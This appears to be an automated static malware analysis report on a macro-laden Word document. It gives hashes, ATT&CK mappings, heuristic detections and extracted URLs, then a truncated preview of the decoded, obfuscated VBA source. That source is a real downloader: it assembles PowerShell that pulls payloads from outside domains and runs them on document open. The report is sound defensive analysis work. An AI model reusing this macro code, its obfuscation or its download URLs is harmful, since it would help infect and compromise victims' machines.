Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8d6eec4b3fadee65…

MALICIOUS

Office (OLE)

Size: 192.5 KB | Created: 2017-12-08 11:09:00 | Authoring application: Microsoft Office Word | First seen: 2017-12-24
MD5: 928faf741c82ab1757e13b73813b82f6
SHA-1: 54473227821926119abada2273c8cbbbf8f84408
SHA-256: 8d6eec4b3fadee65ba0cc21c6ef29e9bac83f0c132e53cc8310a0819e0f345fb
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic | T1204.002 Malicious File | T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function to execute a payload downloaded from a constructed URL. The reconstructed URL is "http://tsimtsuizZ+izZm.eu/JhmSbcRRp8GBP". This indicates downloader or dropper functionality, likely delivered via spearphishing.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://izZ+izZyizZ+izZaylainveizZ0lI+0lI+izZsizZ+izZtizZ+izZmenizZ0lI+0lI+izZt — in document text (OLE body)
    • http://decizZ+izZoraizZ+izZtivesi0lI+0lIzZ+izZtylizZ+izZeinizZ+izZciRTn — in document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 75826 bytes
SHA-256: 2fa05c2a55060a46dddc171752297d3dd64d7aece164d81dedce306337377883
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GUwZGrQNo"
Function dvuptJDpTi()
qSDwYlOjC = UCase("VVJbszTBfzbqQO" + "CkiqwEaTjXAj" + "nPOkfsQnAXHF" + "pKauLWw" + "YzrDjtvBZErO") + UCase("NQiqLXzwBMWk" + "PQspMdkzORWjzz" + "laTPrUbtrD" + "wBnXlVSmiiIjsO" + "mzwMKLYbMbt")
RAMsFnoo = Mid("hjsh9zi9LrqwoWEFv'+'.coi0l'+'I+0lIzZ+izZm/'+'Fi'+'zZ+izZ68qi0lI+0'+'lIzZ+izZOizZ+izZaq/,izZ+izZhttpizZ+izZ://tsimtsuizZ+izZm.eu/JhmSbcRRp8GBP", 18, 111)
bWqSSACQsJ = UCase("oiYCJiUtXKuc" + "DwRrSXMq" + "OkkJqTAkzfb" + "JWBOkSLjZUYA" + "wwFTGaCtNQn") + UCase("AnBsmMOAf" + "ZPdhFBGBtMkit" + "uRrFYnvGOz" + "iKqmIJzzDXqq" + "VBmMXbhWui")
likVCOU = UCase("tZnWAmM" + "iKrjAONVrcq" + "BNicuftnaaa" + "sPYMqHIzjivcHS" + "vwDkkkSE") + UCase("rLbUsYEIjvo" + "pAijUtuTRFUc" + "zpXqpLZLsV" + "fnEHdmsMdZG" + "YBQrXlOlqzAvjh")
DRHBXricu = UCase("iEqNaijTkT" + "wpwMPBuubVC" + "OVjKEFA" + "HcSqIkbwo" + "GZilOhXwWc") + UCase("AvDfBcs" + "XbNjFYUXHEfZzG" + "OdVcGzn" + "jYKHjPKH" + "jCQusqdN")
hvAsscAFYS = Mid("EdktDB0lI+0lIA/,http://izZ+izZyizZ+izZaylainveizZ0lI+0lI+izZsizZ+izZtizZ+izZmenizZ0lI+0lI+izZt'+'s.izZ+izZco'+'m/dAGsizZ+izZb/,hizZ+izZttp://peteizZ+izZrhalliizZ+i0lI+0lIz0lIRivJF8bO", 6, 169)
SEsIVBr = UCase("tkOawizDj" + "mpiNIwuqqwpZU" + "ZdkojmJ" + "wUwcPzJTYz" + "CkvjXiAGEsid") + UCase("PMASuLWufO" + "KOjjvjXarqRRi" + "MGjjEjNriMDwrY" + "bpXWCZJCR" + "XVImdwvW")
izVjqc = UCase("KPrqCFuqoBfzlu" + "TiKuQnIzwWqv" + "KWnsPMoYQsVEN" + "aIbJwHjaNfiwH" + "SvUMKEf") + UCase("OnjYFLDmp" + "DwhoUNsoJjJIK" + "FnGVXJuIK" + "uoZZBUXa" + "rtKUdaHTWuwIG")
skFUVCWmjm = UCase("kmDCiYtwFVO" + "VpVLozJUzOcH" + "JdQZUKz" + "FAOJQqsIbYD" + "GKprqqsHjdV") + UCase("wBZvcWkK" + "DPoGCYHRL" + "pZjtwnYjdS" + "tcfENOQwfFosK" + "vBloSlp")
zlOPsGQ = Mid("hZ(2vBabc in 2vBizZ+izZbcd){try{2izZ+k6DjfEMXb", 2, 36)
WEZRzVkbjf = UCase("RTSFiPjvulY" + "jnTmpMiSSZuScu" + "pYNOAoLIF" + "OpLKwwYvjtUA" + "FkZnLsZAdnzq") + UCase("hXXFVfNDaX" + "IVbVXsBwoo" + "dbAAQjil" + "MTYRBXi" + "pnffNBfpRD")
tvziEV = UCase("FfkPHaIDnG" + "XJmJBpJqVjSBj" + "qDmnuLhCWW" + "TzHpnbRhAmtIrj" + "JuTqniEsRXWQsv") + UCase("UnQJhrCB" + "FATfjwvuEvBn" + "fjVPFpSRLZmq" + "GriBIHsll" + "KYIUbcLztWlH")
QBusVjvRrcq = UCase("UAMjwVlG" + "rsBDoYDZvA" + "ZZUmwCpntdwk" + "fJwbJCVY" + "aFchzmf") + UCase("IziJhvjakufzMw" + "IoXiacPtiKVwOK" + "EDIuVwGDw" + "RAYHqariK" + "saHEWsEzwM")
FIaSLMNatd = Mid("UsMD 0lI95P'+'0lI,[ch'+'Ar]36)) ')-rEPLACE'yD7',[ChAR]36  -rEPLACE  ([ChAR]48+[ChAR]108+[ChAR]73),[ChAR]39) |.( $pshOmE[4]+$pSHOmE[34]+'x')BiSp1Zvi29", 5, 135)
SzuTmCAMF = UCase("oSlMjQubjpSq" + "LDnuuzu" + "KqwUqozbtTjwKu" + "WuJUrLdjqiXQ" + "JwcnNldb") + UCase("rtcuznVlrtRUQ" + "ldCljGGqSXrSur" + "kZQHhDQswLpOE" + "iznswrJKAwUi" + "aEChtis")
AKQhf = UCase("RPTpcpSbvClYQI" + "qlnjdUDqYiv" + "XcuGFmR" + "lFSNlZCPRHBqvv" + "SLOibNY") + UCase("KjluzAvjmzJqlT" + "wDRoZRdFHca" + "uqDplMKHhzi" + "OVbPqmE" + "wlPfKYzdh")
jAkIS = UCase("rwvBBju" + "wSqHfJhzo" + "pLUZVBCISO" + "SWpzSjEK" + "uTKYwuWF") + UCase("dzFJVOQ" + "RatwsOjJdwAH" + "dcohiWBvd" + "fwDpQBIAbih" + "iQIBFdPSw")
vJEdQPDab = Mid("cMwXzbbWDszZmKzF-JOi'+'NizZizZ) ( ((izZ2vBfran'+'c'+'izZ+'+'izZ = neizZ+izZw-oizZ+iz0lI+0lIZbject SystemizZ+i0lI+0lIzZ.NetizZ+izZ.We0lI+NbsQ", 17, 120)
mtLUJA = UCase("iSYYBpiKXia" + "twZOaDpN" + "UXJdIaYfN" + "jZFVLfpU" + "jjPapmsRFwww") + UCase("UMJvOvsOJfKRt" + "ncNiljDjiEzU" + "QJSjOQsFsMQQu" + "XXBFIvAEpsN" + "NkniEwuEc")
AzGholsnXG = UCase("wrzVQcqsPp" + "zOBoZQHVvZZfO" + "YYcRXjLcJwMpul" + "JiTsbfBGNfM" + "zDvZLkYs") + UCase("ObrJcWE" + "bjVVplq" + "nnSWSPl" + "XOZOZBEW" + "bvHbjzIzDlvrm")
QjXTPiztqQ = UCase("HwdhzbkYv" + "tFoZNiEO" + "AIYftmG" + "SXpukLuqXzm" + "pwZiJjwYTva") + UCase("WDFFiRkus" + "SBGQIuujqhSkKC" + "pVNpiMWzXYhG" + "HFMrlsfXctXCi" + "FszlsCWswXEK")
HGkVatCw = Mid("u1VISkI2tmPizZ+iz'+'Zt(1,izZ+izZ izZ+izZ343izZ+izZ245);0lI+0lIizZ+izZ2vBi
... (truncated)